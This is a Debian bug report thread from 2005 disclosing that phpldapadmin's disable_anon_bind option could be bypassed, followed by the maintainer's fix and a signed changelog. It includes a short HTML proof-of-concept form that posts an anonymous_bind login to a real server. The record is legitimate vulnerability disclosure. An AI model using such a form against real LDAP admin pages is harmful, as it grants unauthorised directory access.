Acknowledgement sent to Alexander Gerasiov <gq@cs.msu.su>:
New Bug report received and forwarded. Copy sent to Fabio Tranchitella <kobold@debian.org>.
(full text, mbox, link).
Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security
Even if you deny anonymous login with disable_anon_bind anyone could
access your LDAP server.
As I can see this option only hide checkbox from the input page, but
anyone can create workaround hack:
==========example form to log into eol.lvk.cs.msu.su========
<html><body>
<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php"
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>
</body></html>
=============================================================
I think, that version in sarge is also vulnerable to this trick.
-- System Information:
Debian Release: 3.1
APT prefers testing
APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)
Versions of packages phpldapadmin depends on:
ii apache [httpd] 1.3.33-6 versatile, high-performance HTTP s
ii debconf 1.4.30.13 Debian configuration management sy
ii php4 4:4.3.10-15 server-side, HTML-embedded scripti
ii php4-cgi 4:4.3.10-15 server-side, HTML-embedded scripti
ii php4-ldap 4:4.3.10-15 LDAP module for php4
-- debconf information:
phpldapadmin/ldap-bindpw: secret
phpldapadmin/ldap-tls: false
phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie
Information forwarded to debian-bugs-dist@lists.debian.org: Bug#322423; Package phpldapadmin.
(full text, mbox, link).
Acknowledgement sent to Fabio Tranchitella <kobold@debian.org>:
Extra info received and forwarded to list.
(full text, mbox, link).
Il giorno mer, 10/08/2005 alle 19.35 +0400, Alexander Gerasiov ha
scritto:
> Package: phpldapadmin
> Version: 0.9.6c-4
> Severity: critical
> Tags: security
>
> Even if you deny anonymous login with disable_anon_bind anyone could
> access your LDAP server.
>
> As I can see this option only hide checkbox from the input page, but
> anyone can create workaround hack:
Thanks for pointing this out.
I'm preparing a patch and a new package for this, it will be ready in a
few hours.
--
Fabio Tranchitella <kobold@debian.org> .''`.
Proud Debian GNU/Linux developer, admin and user. : :' :
`. `'`
http://people.debian.org/~kobold/ `-
_____________________________________________________________________
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564
Subject: Bug#322423: fixed in phpldapadmin 0.9.6c-5
Date: Wed, 10 Aug 2005 10:32:17 -0700
Source: phpldapadmin
Source-Version: 0.9.6c-5
We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:
phpldapadmin_0.9.6c-5.diff.gz
to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.diff.gz
phpldapadmin_0.9.6c-5.dsc
to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.dsc
phpldapadmin_0.9.6c-5_all.deb
to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 322423@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Fabio Tranchitella <kobold@debian.org> (supplier of updated phpldapadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Wed, 10 Aug 2005 17:14:01 +0000
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 0.9.6c-5
Distribution: unstable
Urgency: high
Maintainer: Fabio Tranchitella <kobold@debian.org>
Changed-By: Fabio Tranchitella <kobold@debian.org>
Description:
phpldapadmin - web based interface for administering LDAP servers
Closes: 322423
Changes:
phpldapadmin (0.9.6c-5) unstable; urgency=high
.
* debian/control: added build-deps on dpatch.
* debian/patches/login.dpatch: really block anonymous login when disabled
by config files. (Closes: #322423)
Files:
59bd6b27ce9498c9c4408a36dcdbb388 617 admin extra phpldapadmin_0.9.6c-5.dsc
a4e84ec8e644aa65d2b735f87ee734d6 13449 admin extra phpldapadmin_0.9.6c-5.diff.gz
20d8733a521b99277a526caf61bc9c57 714834 admin extra phpldapadmin_0.9.6c-5_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFC+jYJK/juK3+WFWQRAhowAKCgt4oKUWxK0vC4+fpgtAjtZY0NnwCeP+zs
uXNUDOVdCNcBowv8aWp1ekM=
=ooMS
-----END PGP SIGNATURE-----
Severity set to `grave'.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 24 Jun 2007 21:41:03 GMT) (full text, mbox, link).
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.